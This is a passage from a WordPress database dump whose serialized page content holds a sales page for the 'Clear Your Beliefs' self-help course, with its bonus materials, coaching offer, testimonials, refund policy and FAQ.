About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1962, 2233, '_edit_lock', '1457757950:2'),
(1963, 2233, '_wr_page_builder_content', '[wr_row width="boxed" background="none" solid_color_value="#FFFFFF" solid_color_color="#ffffff" gradient_color="0% #FFFFFF,100% #000000"  gradient_direction="vertical"  repeat="full"  img_repeat="full"  autoplay="yes" position="center center" paralax="no" border_width_value_="0" border_style="solid" border_color="#000"  div_padding_top="10" div_padding_bottom="10" div_padding_right="10" div_padding_left="10"   ][wr_column span="span3"][wr_image image_file="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png" image_size="thumbnail" link_type="no_link" image_container_style="no-styling" image_alignment="inherit" appearing_animation="0" disabled_el="no" ][/wr_image][/wr_column][wr_column span="span9"][/wr_column][/wr_row]'),
(1964, 2233, '_wr_html_content', '<div class=''jsn-bootstrap3''><div id=''yGUN1O'' class=''row ''  style=''padding-top:10px;padding-bottom:10px;padding-left:10px;padding-right:10px;''><div class="col-md-3 col-sm-3 col-xs-12" ><div   class=''jsn-bootstrap3 wr-element-container wr-element-image'' ><img width='''' height='''' src=''http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4-150x150.png'' /></div>\n</div><div class="col-md-9 col-sm-9 col-xs-12" ></div>\n</div></div>'),
(1965, 2233, '_wr_page_active_tab', '1'),
(1966, 2233, '_wr_deactivate_pb', '1'),
(1967, 2233, 'rt_custom_css', ''),
(1968, 2233, '_dp_original', '1941'),
(1974, 2234, '_edit_lock', '1518123589:2'),
(1975, 2234, '_wr_page_builder_content', '[wr_row width="boxed" background="none" solid_color_value="#FFFFFF" solid_color_color="#ffffff" gradient_color="0% #FFFFFF,100% #000000"  gradient_direction="vertical"  repeat="full"  img_repeat="full"  autoplay="yes" position="center center" paralax="no" border_width_value_="0" border_style="solid" border_color="#000"  div_padding_top="10" div_padding_bottom="10" div_padding_right="10" div_padding_left="10"   ][wr_column span="span3"][wr_image image_file="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png" image_size="thumbnail" link_type="no_link" image_container_style="no-styling" image_alignment="inherit" appearing_animation="0" disabled_el="no" ][/wr_image][/wr_column][wr_column span="span9"][/wr_column][/wr_row]'),
(1976, 2234, '_wr_html_content', '<div class=''jsn-bootstrap3''><div id=''yGUN1O'' class=''row ''  style=''padding-top:10px;padding-bottom:10px;padding-left:10px;padding-right:10px;''><div class="col-md-3 col-sm-3 col-xs-12" ><div   class=''jsn-bootstrap3 wr-element-container wr-element-image'' ><img width='''' height='''' src=''http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4-150x150.png'' /></div>\n</div><div class="col-md-9 col-sm-9 col-xs-12" ></div>\n</div></div>'),
(1977, 2234, '_wr_page_active_tab', '1'),
(1978, 2234, '_wr_deactivate_pb', '1'),
(1979, 2234, 'rt_custom_css', ''),
(1981, 2234, '_dp_original', '2233'),
(1982, 2235, '_edit_last', '2'),
(1983, 2235, '_wp_page_template', 'page-templates/full-width.php');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1984, 2235, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of 